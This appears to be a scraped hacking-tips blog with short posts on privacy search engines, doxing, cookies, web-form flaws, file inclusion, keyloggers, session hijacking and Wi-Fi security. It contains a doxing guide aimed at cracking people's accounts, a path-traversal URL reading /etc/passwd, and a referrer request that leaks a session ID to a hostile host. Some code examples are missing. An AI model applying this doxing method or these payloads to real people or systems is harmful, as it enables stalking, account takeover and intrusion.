Encrypt Your Search Queries Using SSL Search Engine

Every time when you use a regular search engine, your search data is recorded. Major search engines capture your IP address and use tracking cookies to make a record of your search terms, the time of your visit, and the links you choose - then they store that information in a giant database.

What is SSL?
SSL (Secure Sockets Layer) is a protocol that helps to provide secure Internet communications for services like web browsing, e-mail, instant messaging, and other data transfers. When you search over SSL, your search queries and search traffic are encrypted so they can't be read by any intermediary party such as employers and internet service providers (ISPs).
Here a list of SSL (Secure Sockets Layer) search engines for anonymous Internet search is given below:

Encrypted Google Search over Secure Sockets Layer (SSL) get a complete encrypted search link between your computer and Google. When search traffic is encrypted, it can't be read by third parties trying to access the connection between a searcher's computer and Google's servers. The service is available on web searches only, images and maps search are still not using SSL encryption.
Google Encrypted can be accessed through:
https://encrypted.google.com

Duck Duck Go is an another SSL search engine Challenges Google on Privacy, Which pulls an seach result for Microsoft Bling’s and Google search APIs. It has its own syntax, !bang command allows you to search another site directly. It allows you to change the look and feel of search engine and another awesome thing is duck duck go managed by an single person named as Gabriel Weinberg's and there is no advisement in this search engine.
Duck Duck Go can be accessed through:
http://duckduckgo.com/

IxQuick SSL search engine was awarded as first European Privacy Seal. IxQuick changes its name to Startpage on July 2009. Ixquick privacy policy is to not save the IP number or any other private data on any search and it announced that it would remove its users personal data within 48 hours.
IxQuick | Startpage can be accessed through:
http://www.ixquick.com/
http://www.startpage.com/

Yauba is the world’s first privacy safe; real-time Search Engine. Yuba is a new, experimental, Indian search engine that seeks to transform the way people find information online, while providing maximum protection for their safety, security and privacy. Yauba privacy policy to claims that they do not use any cookies and they say to delete all of your personally identifiable information from their servers on a daily basis.
Yauba can be accessed through:
http://www.yauba.com/

Scroogle is an ad-free Google search proxy which prevents the searcher's data being stored by Google Scroogle aims at letting you use Google without getting tracked. They work very simply: they act as a middleman between you and Google: you send your search query to Scroogle, they send it to Google, Google sends Scroogle the result, and finally Scroogle sends you the result. In the end, Google has no way to know you’re the person who did the search. Additionally, Scroogle also offers the ability to search over an encrypted (SSL) connection, so your ISP (or corporate network, etc) can’t see what you’re searching either.
Scroogle can be accessed through:
http://www.scroogle.org/
https://ssl.scroogle.org/

 

Benefits of using SSL Search EngineTracking of your personal computer IP address is avoidedPeriod (Date & Time) of searching is hidedCookie that generated will be deleted after your search, Duck Duck Go search engine doesnot use cookies by defaultQuery terms/Keyword will not be stored in a database

Doxing - Hackers Information Gathering Technique

Doxing is a technique of tracing someone or gather information about an individual using sources on the internet. Its name is derived from “Documents” or “Docx”. Doxing method is based purely on the ability of the hacker to recognize valuable information about his target and use this information to his benefit. It is also based around the idea that, “The more you know about your target, the easier it will be to find his or her flaws”. This article gives you a brief explanation about doxing and explains how to hack user accounts using doxing

Information that You Can Find Using Doxing
People using internet usually left their information in some website and mostly in social networking site like Facebook, Twitter, Google Plus, etc. Information that you can find using doxing technique are given below.
ActivitiesBirthdayContact InformationGenderIP – AddressLocationNamePersonal InformationSocial Networking Site ProfilesWebsite and many more. . .
Useful Website for Doxing
Pipl - Most of the higher quality information about people is simply "invisible" to a regular search engine. Unlike a typical search-engine, Pipl is designed to retrieve information from the deep web. Pipl robots are set to interact with searchable databases and extract facts, contact details and other relevant information from personal profiles, member directories, scientific publications, court records and numerous other deep-web sources.
Wink - It’s similar to Pipl to find people by name and get their phone number,
Address, Websites, photos, work, school and more.
123people - 123people is a real time people search service that looks into nearly every corner of the Web.  Using 123people proprietary search algorithm, you can find comprehensive and centralized name related information consisting of images, videos, phone numbers, email addresses, social networking and Wikipedia profiles plus and much more.
Zaba Search - Information found using ZabaSearch is all available elsewhere on the web and is all public information. ZabaSearch is a search engine, not a database and does not house, create or manage the information in the search results.
WHOIS – Domain Tools provides a directory that serves as a comprehensive snapshot of past and present domain name registration and ownership records. Most Domain hacking is done by gathering information in this website
Social Networking Site - Social networking site is website where individuals can set up an online profile, describing his/her interests, and add links to other profiles. Social Networking is one of the major source for doxing technique. Some social networking sites like Facebook, Google Plus, Hi5, LinkedIn, MySpace, and Twitter contains lot of information about victim.
Search Engine - Search engine is designed to search for information on the World Wide Web and FTP servers. Information may consist of web pages, images, information and other types of files. Some top search engines for doxing are Ask, Bing, Google, Yahoo!.
Useful Tools for Doxing
Maltego - Maltego is an open source intelligence and forensics application. It will offer you timeous mining and gathering of information as well as the representation of this information in an easy to understand format.
Creepy - Creepy is an application that allows you to gather geolocation related information about users from social networking platforms and image hosting services. The information is presented in a map inside the application where all the retrieved data is shown accompanied with relevant information to provide context to the presentation.
How Doxing is Used for Hacking?
Hackers can gather information about the victim and create a dictionary file for a target person alone. Using that dictionary file, he can crack your passwords.Hacker can get the victim's security question answer using doxing.
Conclusion
Doxing needs Intelligence and searching ability. You have to guess where to search and what to search about person. Depending on searching ability, you will get what you required. Doxing is used mainly by Cyber Crime Experts and Hackers. Overall doxing is a powerful hacking technique. If you like this article please leaves your small comment/feedback below..

Computer Cookie - Working, Vulnerability and Security

Computer cookies are small piece of information in text format that’s sent to an web browser by an web server. This information can be accessed either by the web server or by the client computer. Cookie information can be used for authentication, identification of a user session, user's preferences, shopping cart contents, or anything else that can be accomplished through storing text data.

What are the types of Cookie?
Session cookiePersistent cookieSecure cookieHttpOnly cookieFirst-Party CookieThird-Party CookieSuper cookieZombie cookieUnsatisfactory Cookie
Role of Cookie in Internet
Session Management
Session management is the process of keeping track of a user's activity across sessions of interaction with the computer system.
Personalization
Cookies may be used to remember the information about the user who has visited a website in order to show relevant content in the future. For example a web server may send a cookie containing the username last used to log in to a web site so that it may be filled in for future visits.
Tracking
Tracking cookies may be used to track internet users' web browsing habits. This can also be done in part by using the IP address of the computer requesting the page or the referrer field of the HTTP request header, but cookies allow for greater precision.
How to View Cookies in Web Browser?
Microsoft Internet Explorer
Open the Microsoft Internet Explorer software program.Click on “Tools” in the main menu area of the Internet Explorer browser.Scroll down and select “Internet Options” from the tools menu.Look under the Browsing History section on the General settings tab.Press the “Settings” button.Select the “View Files” button and scroll down until you see the files labeled as cookies.Mozilla Firefox
Start or open your Firefox Internet browser.Select the “Tools” option from the main menu of the Firefox 3 software program.Find the “Options” setting on the tools menu and click on it.Click on the “Privacy” button.Locate the “Use Setting for history” tab and select the “Show Cookies”.Google Chrome
Launch your Google Chrome Internet browser.Find the wrench icon located on the main menu and right click on it.Choose “Options” from the menu.Locate and select the “Under the Hood” tab.Look under cookie settings and press “Show Cookies.”Apple Safari

Open the Safari Internet browser software program.Click on “Preferences” in the main browser menu.Discover the “Security” tab and click on it.Select the “Show Cookies” option on the Security.
Vulnerability on Cookies
Cookies are tracking devices for websites They keep track of commonly used information to help your browser operate more efficiently. They usually won't store passwords but often times track browser history, usernames, and other possible identifiers that can be used to gain access to accounts or exploit security vulnerabilities in your computer. Often they are simply text or web URL files so they won’t contain programs (i.e. viruses). The problem that cookies pose is that they have the ability to “share” this information over the internet.
How to Prevent Cookie from hackers?
Delete all cookies or individual cookies from your browser regularlyUse an updated antivirus in your systemEnable a firewall in your systemUse HTTP Secure Connection if available

Next Generation Domain Naming System - ICANN

Internet Corporation for Assigned Names and Numbers (ICANN) announced a historic change to the Internet's domain naming system on 20th June 2011
ICANN board approved a plan to expand the number of possible internet domain name that new domain naming system allows you to create new Top Level Domains in any language or script, For example .facebook,.hacker, .mac. Currently there are 22 gTLDs (.com, .net, .org) and 250+ ccTLDs (.fr, .de, .cn).To acquire a new generic top-level domain, Organization will be required to pay ICANN $185,000.
Below are some examples for new top level domain announced by ICANN
www.bmw.car
www.nokia.mobile
www.icici.bank
Thus, ICANN give a freedom to user/organization to choose their own new custom gTLD

New gTLDs will change the way people find information on the Internet and how businesses plan and structure their online presence. Internet address names will be able to end with almost any word in any language, offering organizations around the world the opportunity to market their brand,products,community or cause in new and innovative ways.

Applications for new gTLDs (generic top-level domains) will be accepted from 12 January 2012 to 12 April 2012.

Free "The Hackers Underground Handbook" E-Book

The Hacker's Underground Handbook
Learn How to Hack and What It Takes to Crack Even the Most Secure Systems!Author
David Melnichuk
Website
Learn How To Hack
Description
The information given in this underground handbook will put you into a hacker's mindset and teach you all of the hacker's secret ways.The Hacker's Underground Handbook is for the people out there that wish to get into the the amazing field of hacking. It introduces you to many topics like programming, Linux, password cracking, network hacking, Windows hacking, wireless hacking, web hacking and malware. Each topic is introduced with an easy to follow, real-world example. The book is written in simple language and assumes the reader is a complete beginner.
---------------------------------------------------------------------------------------------
Mirror : Hacker's Lodge
Mirror : The Pirate Bay [Torrent]
---------------------------------------------------------------------------------------------

What is Social Engineering

Social Engineering is the most popular and 100% working tool use by hacker to attack on target system.  Social engineering is the trick and mode of gaining sensitive information by exploiting the basic human nature like Trust, Fear, Helping nature etc. There is no software, firewall systems or antivirus that can protect human stupidity. Social Engineering is the term hacker or attacker use to breaking into a network system with the help of human weakness. Various corporate sector and many companies put authentication processes, firewalls, IDS & IPS, Virtual Private Network and network monitoring software to secure their company network and data from the malicious attack or hacker but still hacker can break this all major security devices by doing social engineering and break companies network security. eg. Companies are putting so much efforts and new technologies to secure their company network and data from malicious attack but if an employee may unwittingly give key information by replaying unknown email or by answering questions over the phone with someone they do not know then hacker can use this information to break the computer security with minimum efforts that’s why Social Engineering plays very vital role and important role for hackers. social engineering attacks is very difficult to protect by any security systems

Website Vulnerabilities continued

Closely related to hidden field manipulation, buffer overruns are engineered in a similar fashion; any text input field with a maxchar=n property can be used to potentially shut down the server. The source code can be accessed, and the maxchar property removed. The hacker then enters, say, 10,000 ones and submits the form. What happens next? The server shuts down, taking your business with it. A semi-secure solution to this would again be to encrypt any HTML form source. A better solution would be to allocate memory dynamically, therefore not presetting the memory buffer to a certain size, or writing a function that checks the length of the input before passing the results to the server. If the input exceeds the memory allocation, simply pass back a NULL value.

A simple, yet effective trick in deterring hackers is to configure your web server to hand out customised error 404 pages with a status of 200 when a resource is not found. Most genuine users will not even notice, and a hacker using software to scan for available resources will think they have stumbled across a gold mine. When the hacker goes to check, they will find that they have been duped and hopefully see examining your site further as a waste of time. This could be seen as hacking hackers or the hacker becoming the hacked...

Netcat

You could take this one step further and use an old UNIX application called netcat to crash anyone who attempts to hack your site. Netcat makes and accepts TCP connections, but it can be used by a hacker for many things, including obtaining remote access to a shell, port-scanning and even hi-jacking services and bypassing firewalls. It can also be used to monitor ports and flood suspicious requests, similar to a buffer over-run, by using it to pretend you are running a service that you are not and using the 'yes' command when someone tries to exploit that service. Netcat is an extremely powerful application in itself and is usually part of any self-respecting hackers' tool-kit. Morally, you could look at this as hitting them back first.

Conclusion

I hope that I have drawn your attention to some of the more basic but often overlooked entry-points that a hacker may use to gain entry to your web applications, and highlighted the need for basic auditing of the security enforcement of your site.

This article is not intended to be a complete solution for defense against hacking, but more the starting point for your considerations. No site is completely hack-proof, but there are few sites that really need to be. As a web developer ,your main security concern is first to assess how much security you will actually need. The more secure you need to be, the more your aims will move toward hiring the services of a professional security solution.

MORE HACKS: Hacktips, internet hacking, Network hacking

Who is hacker?

Unfortunately, hacking today is a fact of life. But not all hackers are bad hackers; in fact the term hacker can describe anyone who is enthusiastically interested in computers or programming. The original hackers, the first ever known, are reported to be a group of model railroad enthusiasts who, sometime in the 1950's were given some old telephony equipment as a donation. Not wanting to waste this equipment, they 'hacked' or modified it for use in their railroad system and were able to 'dial in' track switching commands using recycled dialers and other parts of the phone equipment. So the original term hacking also meant to modify or exploit a previously unknown use of something. Punch-card computer systems were soon the subject of hacking, and programmers delighted in finding ways of doing the same things with fewer punch cards. It was shortly after this, sometime in the early seventies, that malicious hacking began to come about in the form of phreaking, hacking into telephone networks and having telephone usage charged to other people or not at all.

Today the terms hacking and hackers have many connotations, the best known being of course people who exploit software and/or the Internet for personal gain or fun. These hackers are sometimes referred to as black-hat hackers, or crackers, and those that simply use software to hack, with no real programming knowledge are called script-kiddies. There is also an increasing number of so-called white-hat or ethical hackers who, among other things, use their skills to test web applications for weaknesses and to help develop security in web applications and software. Often, people who look at open source software and attempt to refine and add to its existing features are referred to as hackers. 

The purpose of this article is not to teach you how to hack sites successfully; I won't be teaching you how to steal credit card numbers, bring down Hotmail or reverse-engineer the latest release of Windows. I'm simply going to show you a couple of scenarios that may reveal to you how vulnerable your existing site may be, or will hopefully help you prevent any future sites from having these vulnerabilities. Don't be fooled however; the iron-clad security needed by some sites such as online banks requires the highest degree of professional assistance. Countless books have been written on the subject of hacking, so there is no possible way for me to discuss all known types of attack. There are some techniques you can try out to attempt to assess the vulnerability of your own site and applications, techniques that once learned, you should employ as part of the creative process in every site you construct.

MORE HACKS: internet hacking, Network hacking, password hacking

What is File Inclusion attack?

Description(This is for educational purposes only)
Local File Inclusion attack consists of exploiting a non-protected script on the server to read the content of another file, that is not initially permitted by the application. The following example shows a vulnerable PHP script (index.php).

With such a script, it is possible to read the content of /etc/passwd file, by calling this way:

http://www.somevulnerablesite.com/index.php?page=../../../etc/passwd
Null byte inclusion
The Null byte inclusion () enables to read files on a server, using a Local File Inclusion (LFI) attack. The following PHP example illustrates the attack:

Such a vulnerable script could enable a hacker to access a non-expected file, by calling such an address:

http://www.somevulnerablesite/index.php?page=../../../etc/passwd

MORE HACKS: internet hacking, keyloggers, password hacking

Protecting from Keyloggers

I guess most of the people know what a keylogger is, but I´ll make a short introduction for those who don´t.
A keylogger is a program like a virus, when it infects your computer it remains hidden everytime you turn it on. Everything looks ok but the keylogger is there working, registering all your keystrokes and sending all the info to the "hacker". Then it´s not really so difficult to steal passwords from other people´s computers using this kind of programs. And you´ll notice nothing unusual until you login to your e-gold account and see all your money has magically vanished, or try to login to your 12DP account and get the "Incorrect login" message... or something worse, who knows!

The problem is that some keyloggers are so sophisticated that an antivirus program cannot detect them. I have personally tested one of those keyloggers in my computer and my Norton (updated) antivirus didn´t block it, nor showed any warning... nothing! ...which is really worring.

Ok, so let´s get to the point.

Maybe you´ve seen that many bank websites ask you for enter your secret number or password using a virtual keypad in their own website instead of typing it. This is a security system designed to avoid keyloggers to register sensible data from customer´s computers.
Ok, but 12DP, E-Gold, etc. have nothing like that, you just have to type your password as usual, therefore you´re exposed to get your passwords stolen in case your computer is infected by a keylogger.

Now this is the interesting thing: you can use your "own" security system, similar to that used by banks, just intalling a "virtual keyboard" program. When you run this kind of programs, you´ll see a virtual keyboard on your screen, so you can "click" your passwords instead of typing them.
In fact I think these programs were designed as an accessibility tool, you know, for people with some kind of physical deficiency who are not able to type, but we can give it a very different application.
Of course "clicking" a password is slower than typing, but it´s much more secure, and there is no keylogger able to track your passwords that way! (as far as I know at least).

Where to get one of those programs? For windows users (the majority, I would say), go to microsoft.com and search "Microsoft Visual Keyboard" (compatible with Win98/NT/ME/2000/XP). It´s freeware!
If you want a program like that for Linux, Mac, etc. go to google and try searching "Visual Keyboard", "Virtual Keyboard", and probably you´ll find something. Good luck!

So in short: if you care your money please protect your passwords.

MORE HACKS: hack books, internet hacking, keyloggers, Network hacking, password hacking

How to change MAC address in Windows?

Under Windows, the MAC address is stored in a registry key. To change a MAC address, find that key with `regedit` and change it. Of course, Microsoft keeps moving the location of the key around!

Windows XP adds an option to change the MAC address on some network cards under the Advanced tab in the network adapter's Properties menu.

A much easier and more reliable method to change a MAC address under Windows is to use a software utility program designed to do this for you.

Macshift is a free utility that you can use to spoof your MAC address under Microsoft Windows MORE HACKS: Hack software, Hacktips, Network hacking, Public Hacks, windows hacks

What is Encryption?

The word "encrypt" means to hide, or to make secret. The earliest forms of cryptography (which just means "secret writing") used simple ciphers to turn ordinary text into unreadable nonsense.

For example, suppose you wanted to encrypt a phrase in such a way that your friends could easily read it, but others could not. You would need to have a simple rule, or ciphering algorithm, that could be used to both encrypt and decrypt the message. A simple encryption algorithm is "shift each letter by one." With this simple code, "a" is coded as "b" and so forth.

Using this rule, the phrase "where science meets fiction" becomes "xifsf tdjfodf offut gjdujpo."

If you try a short example yourself, it should be obvious that computers make the process of encryption and decryption easier and faster.

The "shift each letter by one" cipher is easy to implement - it is also easy to figure out. Over time, more complex encryption algorithms have been used to make it more difficult for others to figure out what cipher is being used.

Keep in mind that a cipher can be made to work on any set of "bits" - not just text. It is also possible to encrypt a digital picture file, a digital music file or a digital video file. Once such a file has been encrypted, it must be decrypted to be viewed or heard.

If you are really serious about security, you will want to use a really serious encryption standard. See the Data Encryption Standard (used by the federal government for over thirty years) or the Advanced Encryption Standard (the current gold standard for encryption).

How to become a hacker

Hello Friends,

This Question has been asked to me by a lot of people. Today I will introduce you to a well known Hacker Mr. David Melnichuk who has written a Book “The Hacker’s Underground handbook”. This book is a first step for all the people who want to become a Hacker. Following is short conversation between me and David:

Hungry Hacker: “David, what’s this The Hacker’s Underground handbook that I keep hearing about?”

David: “I wrote this book a couple months ago. When I first got into the hacking scene, I was just like any other newbie. I asked stupid questions and thought that there was some easy trick to hacking. Little did I know that 4 years later I would still be learning and loving every minute of it. Anyways, after searching for “how to hack” and not coming up with anything useful and understandable, I was told to go read some books.”

Hungry Hacker: “So what did you learn from those books?”

David: “Well Frankly speaking, I didn’t understand what I was reading. Only after some independent research on many topics did I start to understand what hacking was and how broad of a topic it really was.”

Hungry Hacker: ” So what did you do after that?”

David: “I decided to write up this E-Book for all the newbies out there that would love to get into the hacking scene but have absolutely no idea where to begin. This is where my E-Book, The Hacker’s Underground Handbook came from.”

Hungry Hacker: “What can one get from this book?”

David: “The book was created for absolute beginners. It will take you from absolute zero knowledge and leave you at a confident level making you aware of where to go next and how to continue to learn.”

Hungry Hacker: “What all Topics does it cover?”

David: “It covers the beginning of many topics like programming, Linux, password cracking, phishing, network hacking, wireless hacking, malware, and Windows hacking.”

Hungry Hacker: “Thanks David for writing such a useful book.”

So Friends, I don’t think now there is anything left for me to answer your question. If you want to become a Hacker then this books is what you require. go and grab your copy of “The Hacker’s Underground Handbook” as early as possible below.

MORE HACKS: google hacks, hack books, Hacktips, internet hacking, Network hacking, password hacking, phone hacking, Public Hacks, viruses

 

Website Vulnerabilities

Summary: The purpose of this article is not to teach you how to hack sites, but to show you some scenarios that may reveal to you how vulnerable your existing site may be, or will hopefully help you prevent any future sites from having these vulnerabilities.

Malicious hacking often takes primarily two things, time and software. This means that most web sites or applications are vulnerable in some way. But it also means that most weaknesses can be protected by time and applications; for example, in the context of hacking, the difference between a five-digit password and an eight-digit password including a number is approximately 22,000 years. I mean by this that it would take a hacker, using some kind of dictionary attack program around 22,000 years to find your password if it was eight alphanumeric characters. As a standard rule of thumb, enforce your users into creating passwords of at least 8 characters in length and ask them kindly not include words found in the dictionary. This is for your site's protection as much as their own and that of their fellow users.

Web Forms

Web forms are an easy target for hackers or anyone who simply wants to break your applications, as the user is given the opportunity to pass information to your web server, which performs calculations using that information. If you have any forms on your site, (which you undoubtedly will) visit one of them now and in the first text input field you come to type:

I could use this field to execute a script

Press the Go! or Submit! button and you should see:

I could use this field to execute a script

Okay, so you'll probably have some kind of form validation implemented to prevent fields in your forms being left blank, but you can see what I'm getting at here. You just hacked your own form, albeit in a very basic way.

Fortunately, there is a very simple php function which prevents this from happening: HTMLSpecialChars. It's a function that is usually used in conjunction with mySQL database queries, but can be put to work in form processing php scripts as well.

Let's say, for example, that the first text input field on your HTML form captures visitors' names and is called 'name'. This would be assigned the variable '$name' in the php script that's invoked when the submit button is pressed. All you need to do to prevent code execution on your forms is include:

$name = HTMLSpecialChars($name)

somewhere near the top of the php file. Repeat the above example, and the text should be displayed normally. It won't prevent hackers from trying to hijack your applications, in the same way that locking your car won't prevent it from being stolen, but it's a function that should be included in any form processing script you write as a basic security consideration.

If your site uses multiple forms, in a shopping cart for example, it will probably rely upon hidden fields to transfer information from one page to the next (often referred to as persistence). You'll find that if you save the source code of a page containing hidden forms, you can modify the values of hidden forms and then reload the modified page in your browser. Try experimenting this with some of the simpler forms you use that contain hidden fields; if you've been successful, not only have you hacked your own site again, but you've highlighted the fact that others can do this too.

This is an open door to hackers, especially in the case of shopping carts; what would happen to your business if a hacker were able to use the above technique to change the price of all of your products to $1?

One way around this would be to use a one-way hash such as md5 to generate an outgoing message digest containing a concatenated string of all the hidden field names and values plus a secret key. When the form is submitted, it contains an incoming form digest which is also a concatenated string of all hidden field names and values plus the secret key. If the outgoing digest differs from the incoming digest, the hidden field values have been tampered with. An easier, but admittedly slightly less secure method of preventing hidden field manipulation would be to use an html encryption tool on pure html pages, thus hiding the names and values of any field names.

MORE HACKS: internet hacking, Network hacking, password hacking

What is Session Hijacking?

Session Hijacking

Session hijacking is the act of taking control of a user session after successfully obtaining or generating an authentication session ID. Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's Web application session while that session is still in progress.

Detailed Description

HTTP is stateless, so application designers had to develop a way to track the state between multiple connections from the same user, instead of requesting the user to authenticate upon each click in a Web application. A session is a series of interactions between two communication end points that occurs during the span of a single connection. When a user logs into an application a session is created on the server in order to maintain the state for other requests originating from the same user.
Applications use sessions to store parameters which are relevant to the user. The session is kept "alive" on the server as long as the user is logged on to the system. The session is destroyed when the user logs-out from the system or after a predefined period of inactivity. When the session is destroyed, the user's data should also be deleted from the allocated memory space.
A session ID is an identification string (usually a long, random, alpha-numeric string) that is transmitted between the client and the server. Session IDs are commonly stored in cookies, URLs and hidden fields of Web pages. A URL containing the session ID might look something like:
http://www.123somesite.com/view/7AD30725122120803
In an HTML page, a session ID may be stored as a hidden field:

Sometimes, cookies are set to expire (be deleted) upon closing the browser. These are termed "session cookies" or "non-persistent" cookies. Cookies that last beyond a user's session (i.e., "Remember Me" option) are termed "persistent" cookies. Persistent cookies are usually stored on the user's hard drive. Their location is determined according to the particular operating system and browser (e.g., C:\Documents and Settings\username\Cookies for Internet Explorer on Windows 2000).
There are several problems with session IDs. Many of the popular websites use algorithms based on easily predictable variables, such as time or IP address, in order to generate the Session IDs, causing their session IDs to be predictable. If encryption is not used (typically SSL), Session IDs are transmitted in the clear and are susceptible to eavesdropping.
Session hijacking involves an attacker using captured, brute forced or reverse-engineered session IDs to seize control of a legitimate user's session while that session is still in progress. In most applications, after successfully hijacking a session, the attacker gains complete access to all of the user's data, and is permitted to perform operations instead of the user whose session was hijacked.
There are three primary techniques for hijacking sessions:
1. Brute Force - the attacker tries multiple IDs until successful.
2. Calculate - in many cases, IDs are generated in a non-random manner and can be calculated.
3. Steal - using different types of techniques, the attacker can acquire the Session ID.
In Brute Force attacks, the attacker can try many IDs. For example, take a look at the following list of URLs, in which an attacker is trying to guess the session ID:
http://www.somesite.com/view/VW30422101518909 http://www.somesite.com/view/VW30422101520803 http://www.somesite.com/view/VW30422101522507
Session IDs can be stolen using a variety of techniques: sniffing network traffic, using trojans on client PCs, using the HTTP referrer header where the ID is stored in the query string parameters, and using Cross-Site Scripting attacks.
In a "referrer" attack, the attacker entices a user to click on a link to another site (a hostile link, say www.hostile.com):
GET /index.html HTTP/1.0 Host: www.hostile.com Referrer: www.mywebmail.com/viewmsg.asp?msgid=438933&SID=2343X32VA92
The browser sends the referrer URL containing the session ID to the attacker's site - www.hostile.com, and the attacker now has the session ID of the user.
Session IDs can also be stolen using script injections, such as Cross-Site Scripting. The user executes a malicious script that redirects the private user's information to the attacker.

MORE HACKS: Hacktips, internet hacking, Network hacking

Difference between a Hacker and a cracker

When most people think about computer security the word hacker comes to their mind. Another word that is also associated with bad computer behaviour is cracker and most of the time the two words are used interchangeably but they are not the same thing.

A hacker is a person who has a great deal of computing skills and enjoys the challenges of solving technical issues. This includes breaking and infiltrating computers and networks. The aim of hackers is not to cause damage but the technical aspects and how to overcome them fascinates them and they see it as learning and as a status symbol amongst the hacker community.

An individual does not give himself the title hacker but it is left up to the community to bestow that title if the person has demonstrated the required knowledge and proved it. A hacker feels that information should be free so they document how they went about overcoming certain difficulties so others can learn from them. This sharing raises the status of the individual concerned and as a whole the community benefits.

Unlike a hacker the aim of a cracker is to cause mischief and gain some benefit by causing harm to the owner of the computer or network broken into e.g. by stealing credit card details or installing some malicious software.

Hackers see crackers as lowlifes and try very hard to distinguish themselves from them but this is not easy especially when the media insists on calling everybody a hacker.

The difference between a hacker and a cracker might not seem a lot to the average person because after all both of them break into unauthorised computers and networks but in reality there is a big difference because what matters is what the person does after he/she infiltrates a network.

My Best Collection
MORE HACKS: hack books, Hack software, Hacking Videos, internet hacking, mobile hacks, Network hacking, password hacking, phone hacking, Twitter Hacks, Unix and Linux Utilities

Top Wi-Fi security tips

Use a strong password. As I pointed out in the article A little more about passwords, a sufficiently strong password (on a system with decent password protection) makes the likelihood of cracking the password through brute force attacks effectively impossible. Using a sufficiently weak password, on the other hand, almost guarantees that your system will be compromised at some point.

Don’t broadcast your SSID. Serious security crackers who know what they are doing will not be deterred by a hidden SSID — the “name” you give your wireless network. Configuring your wireless router so it doesn’t broadcast your SSID does not provide “real” security, but it does help play the “low hanging fruit” game pretty well. A lot of lower-tier security crackers and mobile malicious code like botnet worms will scan for easily discovered information about networks and computers, and attack those that have characteristics that make them appear easy to compromise. One of those is a broadcast SSID, and you can cut down on the amount of traffic your network gets from people trying to exploit vulnerabilities on random networks by hiding your SSID. Most commercial grade router/firewall devices provide a setting for this.

Use good wireless encryption. WEP is not exactly “good” encryption. With a freely available tool like aircrack, you can sniff wireless traffic protected by WEP and crack security on that network in a matter of minutes. WPA is the current, common encryption standard you should probably be using — though, of course, you should use something stronger as soon as it becomes available to you. Technology is advancing every day, on both sides of the encryption arms race, after all.

Use another layer of encryption when possible. Don’t just rely on wireless encryption to provide all your security on wireless networks. Other forms of encryption can improve the security of the systems on the network, even if someone happens to gain access to the network itself. For instance, OpenSSH is an excellent choice for providing secure communications between computers on the same network, as well as across the Internet. Using encryption to protect your wireless network does not protect any communications that leave the network, so encryption schemes like SSL for dealing with e-commerce Websites is still of critical importance. The fact you’re using one type of encryption in no way suggests you should not be using other types of encryption as well.

Restrict access by MAC address. Many will tell you that MAC address restriction doesn’t provide real protection but, like hiding your wireless network’s SSID, restricting the MAC addresses allowed to connect to the network helps ensure you are not one of the “low hanging fruits” that people prefer to attack. It is best to be effectively invulnerable to the expert security cracker, but there’s nothing wrong with being less palatable to the amateur as well.

Shut down the network when it’s not being used. This bit of advice is even more dependent on specific circumstances than most of them. If you have the sort of network that does not need to be running twenty-four hours a day, seven days a week, you can reduce the availability of it to security crackers by turning it off when it isn’t in use. While many of us run networks that never sleep, and cannot really put this suggestion into practice, it is worth mentioning if only because one of the greatest improvements to the security of a system you will ever encounter is to simply turn it off. Nobody can access what isn’t there.

Shut down your wireless network interface, too. If you have a mobile device such as a laptop that you carry around with you and use in public, you should have the wireless network interface turned off by default. Only turn it on when you actually need to connect to a wireless network. The rest of the time, an active wireless network interface is nothing more than another attack vector for malicious security crackers to use as a target.

Monitor your network for intruders. You should always make sure you have an eye on what’s going on, that you are tracking attack trends. The more you know about what malicious security crackers are trying to do to your network, the better the job of defending against them you can do. Collect logs on scans and access attempts, use any of the hundreds of statistics generating tools that exist to turn those logs into more useful information, and set up your logging server to email you when something really anomalous happens. As a certain cartoon military SpecOps team from the 1980s would tell you, knowing about the danger is half the battle.

Cover the bases. Make sure you have some kind of good firewall running, whether on a wireless router or on a laptop you use to connect to wireless networks away from home. Make sure you turn off unneeded services, especially on MS Windows where the unneeded services that are active by default might surprise you. In fact, do everything you can to secure your system regardless of OS platform, mobility of the system, or type of network.

Don’t waste your time on ineffective security measures. Every now and then, I run across some technically deficient end user handing out free advice about security based on things overheard and half-understood. Generally, this advice is merely useless, though often enough it can be downright harmful. The single most common bit of bad advice I hear from such people with regard to wireless networking is the admonition that when connecting to a public wireless network, such as in a coffee shop, you should only connect if the network uses wireless encryption. Sometimes these people get the advice half right, and recommend only connecting to networks protected by WPA — it’s half right only because WPA is the wireless encryption you should use, if you are going to use wireless encryption at all. There is no point in trying to “protect” yourself by connecting to a public access point only if it uses encryption, however, because the fact that the encryption key will be handed out to anyone that asks for it completely obviates the supposed protection you expect. It’s a bit like locking the front door of the house, but leaving a big sign on the door that says “The key is under the welcome mat,” which only protects against illiterate burglars. If you want your network to be available to everyone that walks onto the premises, just leave it unencrypted, and if you need to connect to the Internet in some public location, don’t worry about encryption. In fact, if anything, the wireless encryption might more properly serve as a deterrent rather than an enticement to using that particular wireless network, because it reduces convenience without effectively improving security at all.

Most of the security tips one can offer about wireless networking are the sort of thing someone might call “common sense”. Unfortunately, there’s an awful lot of “common sense” floating around out there, and it’s not easy to keep it all in mind all the time. You should always check up on your wireless networks and mobile computers regularly to make sure you aren’t missing something important, and you should always double-check your assumptions to make sure you aren’t wasting your energy on something not only unnecessary, but entirely useless, when more effective security measures could use your attention.

How CORE IMPACT Pro Penetration Testing Works

The CORE IMPACT Pro Rapid Penetration Testing (RPT) methodology streamlines testing of servers, desktop systems, end users systems, web applications, wireless networks, and network devices by automating tasks that would traditionally require significant time, effort and expertise to perform.

The RPT automates the accepted best practice for performing penetration tests through six key steps:

For additional information, click on the steps in the diagram below.

IMPACT provides integrated Rapid Penetration Testing capabilities across five attack categories

Network Rapid Penetration Testing: replicates the actions of an attacker launching remote exploits on your network
Client-Side Rapid Penetration Testing: replicates phishing, spear phishing, spam and other social engineering attacks against end users
Web Application Rapid Penetration Testing: replicates SQL injection and remote file inclusion attacks against e-commerce, customer self-service, ERP and other web applications
Wireless Network Rapid Penetration Testing: replicates attempts at discovering Wi-Fi access points, cracking encryption keys, and joining exposed networks
Network Device Penetration Testing: replicates attempts to access networks and intercept data by detecting and exploiting network router and switch vulnerabilities
The five test approaches differ in the Information Gathering and Attack and Penetration stages, as outlined below. The remaining steps of the Rapid Penetration Test are the same once network access is achieved.

Each step is automated using easy-to-use wizards that simplify testing for new users and allow advanced users to efficiently execute common tasks. Advanced users can also manually run specific product modules to further customize the penetration testing process.

More information about Core impact can be found here.

MORE HACKS: Hack software, internet hacking, Network hacking

what is identity theft?

1.Over 50 of the reported information breaches from the last year have been attributed to personal computer hacking.

